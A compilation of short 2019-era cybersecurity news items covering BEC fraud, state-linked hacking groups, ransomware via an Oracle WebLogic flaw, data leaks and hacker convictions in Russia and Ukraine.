Nigerian BEC Fraudsters Resorting to RATs as the Tool to Amplify Attacks



The number of Business Email Compromise, also known as BEC fraud has risen up by an alarming rate; hackers have resorted to Remote Access Trojans (RAT) to amplify their attacks. 

The FBI’s Internet Crime Complaint Center, IC3 attempted to reduce the damage done by these attacks by formulating a Recovery Asset Team which took care of the consequences of  BEC scams. However, the number of scammers involved in these kinds of attacks is significantly more than ever before.

The attacks which witnessed an unprecedented upsurge are regarded as a global threat with Nigeria practicing it extensively; in the African country, money making via BEC scams have become the norm. After examining the cybercrime in Nigeria, Palo Alto Network’s Unit 42 recorded the country’s evolution into employing ransomware and malware to attain financial objectives.

In 2018, the number of groups involved in BEC scams reached up to 400 which were a hundred more than the previous year, the activities further multiplied by 54% in comparison to the year 2017.

With a monthly average of 28,227 attacks, the most affected sector was High-tech which recorded over 120,000 attacks in the previous year and the second most targeted was the wholesale industry which was subjected to around 80,000 attacks. Lastly, the third most affected sector was manufacturing, which fell prey to a total of 57,000 attacks.

Monitoring the attacks, Verizon says in a report, “Given the sheer number of incidents in this sector, you would think that the government incident responders must either be cape and tights wearing superheroes, or so stressed they’re barely hanging on by their fingernails.”

“Admittedly we do not have as much data as to what is happening beyond the deception and initial device compromise. The inclusion of keylogging malware is a good indicator that additional credential theft and reuse is a likely next step.”




Buckeye APT hackers stole the NSA hacking tools before Shadow Brokers leaked these tools




Buckeye APT hackers, a Chinese State sponsored group employed the tools of Equation Group which were leaked by the Shadow Brokers in 2017, a year earlier than the leaks.

Shadow Brokers is a mysterious assemblage of hackers who stole malware, hacking tools and zero-day exploits from the Equation group which is a branch under the NSA and is one of the most advanced and futuristic cyber attack groups across the world.

Conducting operations since 2009, Buckeye group, also known by the name of APT3, exploited these tools earlier for carrying out multiple attacks on to a number of organizations on their list, they did so in order to gain unauthorized access to these organizations mainly based in the United States.

Besides being responsible for exploiting zero-day vulnerabilities in 2014, the Buckeye group, a couple of years later, used 'Trojan.Bemstour', a custom exploit tool in order to reach the targets.

With the intent to attain remote kernel code execution on victims' computer systems, Bemstour exploited the following zero-day vulnerabilities on Windows – (CVE-2019-0703),(CVE-2017-0143). These were later employed by EternalRomance and EternalSynergy, two NSA owned exploit tools,

Referenced from the findings of Symantec report, “Bemstour is specifically designed to deliver a variant of the DoublePulsar backdoor. DoublePulsar is then used to inject a secondary payload, which runs in memory only. The secondary payload enables the attackers to access the affected computer even after DoublePulsar is removed. “

“The variant of DoublePulsar used in the first attacks performed by Buckeye was different to that leaked by the Shadow Brokers. It appears to contain code to target newer versions of Windows (Windows 8.1 and Windows Server 2012 R2), indicating that it is a newer version of the malware.”







A Hacker Group, 'Barium' on a Supply Chain Hijacking Spree



One of the most fatal forms of hacking is a software supply chain attack as it involves illicitly accessing a developer's network and placing the malicious code into the software updates and applications that users consider and trust the most.

In a single attempt, supply chain hackers can potentially place their ransomware onto thousands or millions of computer systems, they can do so without even a single trace of malicious activity. With time, this trick has gained a lot of traction and has become more advanced and difficult to be identified. Supply chain attacks follow a similar pattern and have been used by the associated companies as their core tool.

Basically, supply chain attacks exploit various software dissemination channels and over the last three years, these attacks have been majorly linked to a group of Chinese hackers. Reportedly, they are popularly known as ShadowHammer, Barium, Wicked Panda and ShadowPad, the name varies along with the security firms.

The trick demonstrates the massive potential of ShadowHammer to destroy computer systems on a large scale along with exploiting vulnerabilities present in a fundamental model which governs the code employed by users on their systems, such destructive ability possessed by Barium is a matter of great concern for security researchers.

Referencing from the statements given by Vitaly Kamluk, the director of the Asia research team for security firm Kaspersky, "They're poisoning trusted mechanisms," "they’re the champions of this. With the number of companies they’ve breached, I don’t think any other groups are comparable to these guys."

"When they abuse this mechanism, they’re undermining trust in the core, foundational mechanisms for verifying the integrity of your system,"

"This is much more important and has a bigger impact than regular exploitation of security vulnerabilities or phishing or other types of attacks. People are going to stop trusting legitimate software updates and software vendors."

On being asked, Marc-Etienne Léveillé, a security researcher, said, "In terms of scale, this is now the group that is most proficient in supply chain attacks,"

"We’ve never seen anything like this before. It’s scay because they have control over a very large number of machines

"If [Barium] had deployed a ransomware worm like that through one of these attacks, it would be a far more devastating attack than NotPetya," said another expert on the matter.







Attackers Exploiting Oracle Weblogic Server Vulnerability to Encrypt User Data



In order to install a new variant of a malware known as "Sodinokibi", con men are taking advantage of the remote code execution vulnerability in Oracle Weblogic Server.

The vulnerability which has been recently discovered on versions
10.3.6.0, 12.1.3.0 of Oracle WebLogic Server, allows people with HTTP access to execute the attack without any verification.
Reportedly, a patch has been issued by the computer sofyware company on April 26.

The foundation of the attacks was laid around April 25 and it was on the next day, i.e., April 26, the hackers secured connections with multiple HTTP servers which were vulnerable, as per the findings of Talos Investigation.

The vulnerability has been exploited by the hackers to download the malware copies from servers administered by con men and to corrupt various legitimate sources and make alterations to repurpose it.

“Cisco IR Services and Talos observed the attack requests originating from 130.61.54[.]136 and the attackers were ultimately successful at encrypting a number of customer systems.”

How does the ransomware infects?

It begins with the HTTP POST request which carries certutil command to execute the infectious files upon downloading.

As soon the malicious process starts, it triggers the vssadmin.exe utility, which on being executed assists Windows in generating some sort of backup, either automatic or manual.

After this, the ransomware attempts to hinder the recovery process by terminating backup mechanism.

Users can reach the security alert posted by Oracle and are advised to fix the forementioned (CVE-2019-2725) vulnerability.  

Russian hacker convicted of hacking a payment system and stealing from ATMs


The court of the Saratov region found guilty a local resident who hacked and gained access to the website of the Omsk company collecting utility payments.

A 19-year-old hacker was accused under the article "unauthorized access to computer information." Employees of the Federal Security Service of Russia in the Omsk region found and detained him.

Omsk investigators found that in the autumn of 2017 the defendant hacked into the payment system using special software from his home computer. The system was intended to make online payment of utilities.

As a result, the hacker was able to gain access to user personal accounts. After copying all the information, he contacted representatives of the Service and offered for a fee to provide information about the way to fix the vulnerability in the security system.

The court found him guilty and sentenced him to twelve months for unauthorized access to computer information.

At the same time in Krasnoyarsk, it turned out that the hacker group hacked the management system of ATMs using special devices.

According to Irina Volk, the official representative of the Ministry of Internal Affairs of Russia, a criminal group of three men aged 24 to 57 years committed 27 crimes from October 2017 to February 2018. However, at the time of the arrest, the defendants were involved in 8 similar crimes, the total amount of damage was 15 million rubles. So, the number of crimes and damage has doubled for today.

Hackers worked at night, used software to disable the security system then opened payment terminals.

Criminals were detained by the police when committing another theft. During searches, police seized the computer equipment, tools and two expensive cars bought on the stolen money.

Hackers are waiting in custody the verdict of the court. They are charged under six articles.

Hacker from Novovoronezh was convicted of a cyber attack on the library

A resident of Novovoronezh received a year of imprisonment for a cyber attack on the Kurgan Regional Universal Scientific Library. The crime was solved by employees of the FSB of the Voronezh region.

According to the Press Service of the Voronezh Prosecutor's Office, in February 2018, 24-year-old Mikhail Nazarov installed malicious software on his PC with which allowed him to destroy, block, modify or copy the information and to bypass its protection. The guy found the Internet resource of the Government of the Kurgan region, namely the Library and committed a series of cyber attacks. Why the young man chose this resource is not specified.

However, hacker came to the attention of the FSB, whose officers seized cyber attacks and detained the attacker. Law enforcement authorities opened a criminal case under the article “Creating, using and distributing malicious computer programs”. The maximum penalty under this article is 4 years of imprisonment.

The Court found the young man guilty and sentenced him to one year in prison conditionally. Nazarov received a shorter sentence since he admitted his guilt.

We will remind that earlier the Court of the Voronezh region has sentenced a 30-year-old local resident to one and a half years of imprisonment and 10 thousand roubles a fine for hacker attacks on State sites of Siberia and the Far East. Moreover, the hacker managed to hack the websites of commercial organizations. The man used the hacked services for personal mercenary purposes, including mining.

Hackers from Fancy Bear were accused of attacking the Ministry of Defense of Spain

The authoritative Spanish online edition Español citing anonymous sources reported on April 12 that Russian hackers from Fancy Bear were responsible for the attacks on the Spanish Ministry of Defense at the beginning of the year.

This conclusion was made by investigators after analyzing the methods of cybercriminals. Hackers used the same scheme as they did during the hacking the servers of the US Democratic Party in 2016, after which the hacker group became known worldwide.

It is noted that the virus was introduced through external e-mail in order to gain access to the "technological secrets of the military industry."

According to experts, the computers of the Defense Department were under the complete control of hackers for three months. And only in March it became known that the computer network of the Ministry of Defense of Spain was hacked using a virus.

It should be noted that foreign politicians and journalists associate this hacker group Fancy Bear with the Russian authorities. They believe that the purpose of cybercriminals is "to undermine democracy." However, the connection of the hacker group Fancy Bear with the authorities or intelligence services of Russia has not been proven. This statement is based solely on speculation and assumptions.

The database of patients of Moscow region ambulance leaked to the Internet

The database of patients of ambulance service of Moscow region is publicly available on the Web and is stored on file hosting service with a capacity of 17.8 GB. The document contains information, such as the name of the person who called the ambulance, the contact phone number, the address, the date and time of the call, a description of the patient's condition upon the arrival of the doctors.

The representative of the Ministry of Health said that the management system of the ambulance service applied all the necessary measures to protect information in accordance with the current law. The data of citizens is securely protected and only authorized employees have access to it.

The company Group-IB explained that the leak occurred through the database management system MongoDB.

Anastasia Tikhonova, Head of the group-IB threats research group, said that the database was almost in the open access and did not require authorization or other security settings.

In addition, Anastasia added that a group of Ukrainian hacktivists THack3forU leaked the base to the network. They are activists who use computer hacking to promote the ideology of free speech and political freedom. Such cybercriminals use leakage for dirty political purposes.

Andrei Arsentiev, an analyst of InfoWatch, explained that the reason for the leak was the fact that the operator left the MongoDB cloud server unprotected, forgetting to protect it with a password.

Denis Legato, an anti-virus expert of Kaspersky Lab, stressed that the main problem in this situation was the inattention of administrators to the security settings.

It is worth noting that a month ago it became known about the leakage of the database of patients in the Lipetsk region. As a result, the Head of the Department of material and technical support of the Health Department lost his post.

Hackers broke into the database Bashauto


The largest transport company in the Republic of Bashkortostan Bashauto(Bashavtotrans) was hacked by attackers. They broke the work of accounting system "1C" which is engaged in the economic and organizational activity of the company.

Hackers want to get 1 million rubles from the largest supplier of buses on the roads of Bashkiria. An interesting fact is that the company denied hacking.

Employees of the company said that they recorded the technical failure, which was fixed only on April 4. The problems with the purchase and booking of bus tickets began on April 1 in the system of bus stations.

An Unknown Source said that the accounting staff of the company went on administrative leave. So, the accounting department did not take the phone. The representative of Bashauto explained this by the fact that the information of contact numbers on the website of the company is outdated, it will soon be updated.

Computer security expert Artur Kareev noted that hackers, hacking the websites of State institutions, undermine the reputation of the country and raise their authority among programmers. He has three points of view to solve this problem. First, you need to install an antivirus to protect yourselves. Secondly, moderation and administration of the site will help to strengthen the protection. Finally, the use of a complex programming language and a server without leaving the internal network will also help to resist hackers.

Hackers in Ukraine are attacking Government websites


On the eve of the presidential elections in Ukraine, phishing attacks on Government Internet resources were activated.

According to the Head of the Computer Forensics Laboratory, the intensity of cyber attacks is increasing every year. It is a permanent process and is not necessarily associated with the elections. However, at the moment, the sites of the Central Election Commission, the Presidential Administration, the Cabinet of Ministers and infrastructure departments may be under attack.

In general, the situation with the cyber defense of Governments departments is now much better than a few years ago, since the cyber defense was improved by European financial assistance. Many different projects on quality protection have been funded.

At the same time, the sites of presidential candidates are in the risk zone of hacker attacks on the eve of the elections. It turned out that politicians can simulate the attack of hackers on their resources for the sake of PR to emphasize their importance.

US Court Authorizes Microsoft to be in Charge of 99 Hacking Sites


Microsoft has been legally given the control of 99 websites which were being operated in association with an Iranian hacking group, Phosphorus. 

In order to prevent the sites from being employed for the execution of cyber attacks, a US court authorized Microsoft's Digital Crimes Unit to be in charge of these websites related to the aforementioned hacking group which is also known as Charming Kitten, Ajax Security Team and APT 35.

The malicious group, Phosphorus is configured to employ spear-phishing to sneak into private accounts of individuals. Cybercriminals at Phosphorus resort to social engineering in order to lure individuals to click on the links, at times sent via fake accounts that appear to be of familiar contacts. The link carries infectious software which allows Phosphorus to sneak into the computer systems.

Basically, it performs malicious activity to acquire access to sensitive data stored onto the computer systems of government agencies and businesses.

Putting the same into context in a blog post, Tom Burt, Corporate Vice President, Customer Security and Trust at Microsoft, said, "Its targets also include activists and journalists - especially those involved in advocacy and reporting on issues related to the Middle East,"

"Microsoft's Digital Crimes Unit (DCU) and the Microsoft Threat Intelligence Center (MSTIC) have been tracking Phosphorus since 2013,"

"Phosphorus also uses a technique, whereby it sends people an email that makes it seem as if there's a security risk to their accounts, prompting them to enter their credentials into a web form that enables the group to capture their passwords and gain access to their systems," Burt told in his blog post.


Commenting on the matter, Microsoft said, "The action we executed last week enabled us to take control of 99 websites and redirect traffic from infected devices to our Digital Crime Unit's sinkhole."

Ukrainian cyber police again caught Russian hackers

It is not the first time when the Ukrainian cyber police declared about declassifying a group of Russian hackers.

According to police officers, hackers created a mailbox, using the Anonymizer and worked from the territory of Russia.

It turned out that they sent fake emails on behalf of Interior Minister Arsen Avakov. Emails contained rules of conduct for police officers during the elections. In addition, the police were required to take certain actions in favor of one of the candidates.

On the Internet, there is an opinion that the news is fake. Many people know that real hackers do not even need to create a mail to send messages. They can go to the server of the police and send emails directly. And can do it from any other host on which the port number 25 is open, intended for the SMTP protocol.

Perhaps citizens of Ukraine decided to joke this way. They just installed a browser with VPN and created mail. That's enough to hide location. Moreover, this incident was another reason to accuse Russia of intervening in the Ukrainian presidential election.

 

Krasnoyarsk hacker tried to hack the State procurement site

The Krasnoyarsk court imprisoned a resident of Krasnoyarsk who tried to hack the State procurement site of the Vladimir region but was caught by the FSB.

According to the Prosecutor, in February 2016 hacker installed on his computer a special program for illegally copying files from other electronic devices. Further, he tried to hack the State procurement site of the administration of the Vladimir region and get logins and passwords to some data. However, the attempt to hack the State resource was identified and stopped by the FSB officers.

It should be noted that the defendant was an information security officer at a large Russian bank.

The court found the man guilty and sentenced him to 2 years of imprisonment with a fine of 50 thousand rubles.

The hacker disagreed with the decision of the court and tried to appeal the verdict, but the regional court rejected his arguments and left the decision of the court of the first instance unchanged.



Zero-day Stored XSS Vulnerability Allowed Attackers to Compromise 70,000 Websites



Researchers found out that "Social Warfare", a social sharing plug-in powered by Warfare Plugins is infected with a critical Stored XSS Zero-day flaw which allows cybercriminals to place malicious scripts and conquer the assailable WordPress websites.

'Social Warfare' is a social sharing plugin which is essentially used to accumulate more website traffic by receiving more social shares for website developers.

Amidst some of the plugins debugging features, the plug-in carries an exploitable code which assists the payload in being stored in the website's database and reclaimed with every page request.

Referencing from Sucuri research, “These features aren’t directly used anywhere and rely on various $_GET parameters to be executed, which makes it easy to see if your site was attacked using this vulnerability."

The exploit which was rampantly distributed across the globe is a critical flaw that has allowed hackers to entirely gain control of the ill-protected websites in the sphere.

As the abuse of the exploit continued, multiple ongoing attempts from over a hundred distinct IPs were noticed by the analysts.

Reportedly, around 70,000 websites have the plugin installed and the attacks are likely to multiply if the flaw is left unpatched. Meanwhile, users are advised by the experts to get an update to version 3.5.3.


Hackers Tracking Location History via Google Photos Vulnerability


A vulnerability has been found in the web version of Google photos which lets malicious websites access the sensitive information related to the photos such as date and geographic coordinates.

On the basis of this metadata information of your photos, they will be tagged by Google photos automatically.

The metadata of any photo allows details to be moved along with the photograph file which is readable by end users, hardware and software.

How the Hack Functions

To begin with, the hackers have to befool the user and trick him into accessing the malicious website while he is logged into his Google Photos account.

As soon as the malicious website opens in the web browser, it generates answers to the questions the attacker has by stealthily generating requests to the Google Photos search endpoint.

As stated in a report by Imperva, the hacker can keep a record of the queries which have been already asked and resume the process from there on upon your next visit onto any of his infectious websites.

Reportedly, the vulnerability has been patched by Google after Imperva brought it to their knowledge.





Enterprise VPN Provider Citrix, Hacked; 6TB of Sensitive Data Stolen



Enterprise VPN provider, Citrix, was subjected to a hack which is doubted to have stolen private data pertaining to the company’s technology.

On Friday, Citrix told that FBI informed them about "international cyber criminals" working their way into the organization’s networks.

They were further told that most probably the criminals resorted to the technique of “password spraying” to break into the company’s networks. They did do by appropriately guessing the password to an account which belongs to the company.

The hackers involved are reported to be a part of an Iranian Hacking group which has attacked over 200 companies, along with multiple government agencies, technology firms and gas, and oil companies.

Referenced from a blog post by Resecurity, the cybersecurity firm contacted Citrix in an attempt to warn them about the hack which was on the way.

And, while refraining from telling the origins of the source from where the firm learned of the hack, it said that it "has shared the acquired intelligence with law enforcement and partners for mitigation."

While FBI denied commenting on the matter, Resecurity drew a connection between the hackers and a nation state, "due to strong targeting on government, military-industrial complex, energy companies, financial institutions and large enterprises involved in critical areas of economy."

Citrix expressed a probability of business documents being acquired and downloaded by the attackers and told in a notice, "The specific documents that may have been accessed, however, are currently unknown."

"Citrix has taken action to contain this incident. We commenced a forensic investigation; engaged a leading cybersecurity firm to assist; took actions to secure our internal network; and continue to cooperate with the FBI," the company further included in the notice.



Anonymous Threat Group Compromised 1 Million Web Pages of Popular Brands like Coca-Cola and McDonalds’s



Around 1 million Israeli based webpages owned by renowned brands like McDonalds’s and Coca-Cola have been compromised by an anonymous group of hackers who notably breached the websites of leading brands which were introduced for Israel natives with address ‘co.il’  – Cocacola.co.il and McDonalds.co.il and etcetera.  

The hacker group employed third-party accessibility plug-in known as ‘nagich.co.il’ which loaded infected JavaScript code that compromised the website and assisted the threat actors in exploiting and corrupting a million of web pages.

There’s a critical vulnerability which existed in the disabled page accessibility plug-in, Nagich, it permitted access to more than 1 million Israel based webpages and primarily assisted the attackers in corrupting the webpages.

Besides websites of renowned brands – Coca-Cola, McDonald’s and Toys"R"Us, other popular websites namely Ynet and Calcalist also fall prey to this breach. Reportedly, the attackers corrupted these websites and displayed political messages.

The Nagich website is not a usual site, it’s a website which contains an accessibility plugin - a Javascript which runs on a website which opts for this service and provides it a multitude of options. 

On giving necessary permissions, the severe vulnerability can run code on the website which means it can make any changes in our site and do whatever it wants. Hackers exploited it to replace the malicious code with an embedded link with the motives of corrupting webpages.

Due to the delay in taking remedial measures to patch the vulnerability, Nagich officials, in a way led hackers to compromise hundreds of webpages.  



The Kremlin told about hacker attacks on the website of the President of Russia



Foreign hackers are constantly attacking the website of Russian President Vladimir Putin. Intelligence agencies record a large number of attacks from Europe and the United States said the Kremlin.

As the Press Secretary of the Russian leader, Dmitry Peskov, noted, Western countries like to talk about" Russian hackers", but foreign partners themselves are waging an information war against Russia.

"A huge number of cyber attacks on Russian organizations, individuals and legal entities are constantly organized from the territory of the United States," he said.

According to him, hackers from Europe and North America regularly try to commit hacks. He noted that a new draft law on Autonomous RUnet is aimed at countering this.

The draft law on the Autonomous operation of the Russian Internet segment, if it is disconnected from the global network infrastructure, was submitted to the State Duma on December 14, 2018. The document is aimed at protecting the stable operation of the Internet in Russia in case of external threats. The bill defines the necessary traffic routing rules and organizes the control of their compliance.

Attacks on the US Companies by Chinese and Iranian Hackers Renewed


As a result of Trump pulling the U.S out of the Iran nuclear deal last year and the trade disputes between the U.S and China, Iranian and Chinese hackers heavily attacked corporations and government agencies in the United States. Security experts are of the opinion that these hackers have been fuelled by the conflicts of the past.

Referencing from the briefing of seven people who gave a glimpse of the incidents, the recent attacks which targeted multiple US corporations, government agencies, American banks, and various businesses were more brutal than those which were carried out in past. These people were not permitted to publicly discuss the details. 

Analysts and security researchers at National Security Agency sourced the attacks to Iran. Meanwhile, FireEye, which is a privately owned security firm, instigated an emergency order when the government shutdown took place last month. They did so by the Department of Homeland Security.

Reportedly, these Iranian attacks occurred simultaneously with a renewed Chinese offensive configured to steal sensitive data related to military and trade from U.S tech companies and military contractors.

Commenting on the matter, Joel Brenner, a former leader of United States counterintelligence under the director of national intelligence said, “Cyber is one of the ways adversaries can attack us and retaliate in effective and nasty ways that are well below the threshold of an armed attack or laws of war,”






The Ukrainian man stole half a million from crypto-wallets



The man, who stole 500 000 UAH (18 350 USD) from the crypto-wallets of clients of the online cryptocurrency exchange, was detained in the Kiev region.

The Ukrainian cyber police stated that the 35-year-old man provided technical support to the British stock exchange with online cryptocurrency exchange and had access to personal data of customers. He used them to steal from Bitcoin and various Altcoin accounts. Thus, he stole 500 000 UAH for several months.

Theft of cryptocurrency occurred in several stages. At first, the attacker was looking for accounts of clients who for a long time did not open their accounts and did not have a complex authentication system.

After that, the Ukrainian made a substitution of backup e-mail boxes or added them to accounts where they were not specified. Thus, he restored the passwords to the wallets and initiated the debiting of electronic money.

Conversion and withdrawal of money took place through an online exchange.

At the moment the amount of damage is 720 000 UAH (26 400 USD). The received funds the attacker spent on gambling on virtual simulators of slot machines.